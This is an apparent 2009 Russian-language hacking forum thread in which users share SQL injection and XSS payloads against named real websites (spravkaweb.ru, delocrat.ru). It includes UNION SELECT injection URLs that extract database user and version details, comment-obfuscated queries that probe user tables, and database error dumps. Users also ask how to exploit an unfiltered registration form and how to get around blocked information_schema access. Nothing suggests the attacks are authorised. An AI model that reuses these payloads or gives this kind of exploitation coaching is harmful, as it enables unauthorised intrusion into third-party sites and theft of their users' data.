08.06.2009, 11:56
|
|
Banned
Регистрация: 12.07.2008
Сообщений: 206
С нами:
9384837
Репутация:
33
|
|
Набрал такую ссылку,вывел мне запрос гляньте скажите че это
http://www.spravkaweb.ru/javascript:_alert%28%27Hello_world%27%29%3B
|
|
|
08.06.2009, 12:59
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
http://www.spravkaweb.ru/jhj'_union_select_1,2,3,concat(user(),0x3a,version ()),5,'1
забавная скуль)
жаль, что знак подчеркивания на пробел заменяется...
Последний раз редактировалось laedafess; 08.06.2009 в 13:03..
|
|
|
|
08.06.2009, 13:07
|
|
Banned
Регистрация: 12.07.2008
Сообщений: 206
С нами:
9384837
Репутация:
33
|
|
этой скулью можно ченить сделать веселого?
|
|
|
|
08.06.2009, 13:50
|
|
Участник форума
Регистрация: 21.03.2009
Сообщений: 207
С нами:
9021828
Репутация:
119
|
|
ребят помогите пожалуйста
на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида
Warning: mssql_query() [function.mssql-query]: message: Unclosed quotation mark before the character string '1\')'. (severity 15) in /opt/lampp/htdocs/register/processor.php on line 32
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '1\')'. (severity 15) in /opt/lampp/htdocs/register/processor.php on line 32
Warning: mssql_query() [function.mssql-query]: Query failed in /opt/lampp/htdocs/register/processor.php on line 32
Ошибка выполнения запроса! Видимо что-то не так... SELECT * FROM users WHERE (name = '1\'')
Можно ли чего с этим сделать??? |
|
|
|
08.06.2009, 13:52
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Судя по выводимой ошибки для завершения запроса необходима кавычка а у тебя она слешируеться.
|
|
|
|
08.06.2009, 13:55
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от Nizhegorodets
ребят помогите пожалуйста
на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида
Можно ли чего с этим сделать???
magic quotes экранирует кавычку..
|
|
|
|
08.06.2009, 14:01
|
|
Участник форума
Регистрация: 21.03.2009
Сообщений: 207
С нами:
9021828
Репутация:
119
|
|
спасибо пойду гуглить...
|
|
|
|
08.06.2009, 14:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
2 aqqa
http://www.spravkaweb.ru/php'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/'1'='1
Вместо 1 подбирай имя столбца =)
|
|
|
|
08.06.2009, 15:02
|
|
Banned
Регистрация: 12.07.2008
Сообщений: 206
С нами:
9384837
Репутация:
33
|
|
А вот нашел кое что круое
Warning: oci_execute(): ORA-01460: unimplemented or unreasonable conversion requested in /srv/www/apache2/htdocs/cms_adm/lib/44/oracle.class.php on line 95
array (
0 => 'http://www.spravkaweb.ru/php\'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/\'1\'=\'1',
1 => '',
)
аракловская база линуксовый сервак,
|
|
|
|
08.06.2009, 15:33
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
С нами:
10137645
Репутация:
82
|
|
Добрый день всем !
Возникли трудности с сайтом! SQL-inj есть а вот вывод настроить не получается...
Доступ к mysql.user и information_schema.columns закрыты =(
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4--
Как можно обойти это?
Заранее спасибо!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
